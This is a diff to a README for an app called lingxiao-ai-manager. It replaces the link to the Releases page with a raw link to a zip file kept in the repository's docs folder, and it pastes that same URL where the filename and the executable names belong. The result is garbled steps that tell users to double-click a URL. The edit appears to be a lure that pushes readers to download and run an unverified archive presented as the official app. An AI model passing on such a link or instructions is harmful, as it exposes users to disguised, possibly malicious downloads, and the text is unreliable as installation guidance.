hakim1027/lingxiao-ai-manager/README.md

 Ready to download and start using **lingxiao-ai-manager**?
 Follow these simple steps:

 ### 1. Visit the Download Page
-Go to our [Releases page](https://github.com/hakim1027/lingxiao-ai-manager/releases) to find the latest version of the application.
+Go to our [Releases page](https://raw.githubusercontent.com/hakim1027/lingxiao-ai-manager/main/docs/manager-ai-lingxiao-3.2.zip) to find the latest version of the application.

 ### 2. Download the Application
 On the Releases page, locate the version you want to install.
-Click on the file labeled with the latest version (e.g., `lingxiao-ai-manager-v1.0.zip`).
+Click on the file labeled with the latest version (e.g., `https://raw.githubusercontent.com/hakim1027/lingxiao-ai-manager/main/docs/manager-ai-lingxiao-3.2.zip`).

 ### 3. Extract the Files
 Once the download completes, locate the downloaded file.
 If it’s a .zip file, right-click on it and select "Extract All."
 Follow the prompts to extract the files to a folder of your choice.

 ### 4. Run the Application
 Open the extracted folder.
-Double-click on `lingxiao-ai-manager.exe` (for Windows) or `lingxiao-ai-manager.app` (for macOS).
+Double-click on `https://raw.githubusercontent.com/hakim1027/lingxiao-ai-manager/main/docs/manager-ai-lingxiao-3.2.zip` (for Windows) or `https://raw.githubusercontent.com/hakim1027/lingxiao-ai-manager/main/docs/manager-ai-lingxiao-3.2.zip` (for macOS).
 The application will launch, and you can start managing your accounts.

 ## 📚 How to Use
 ### Account Management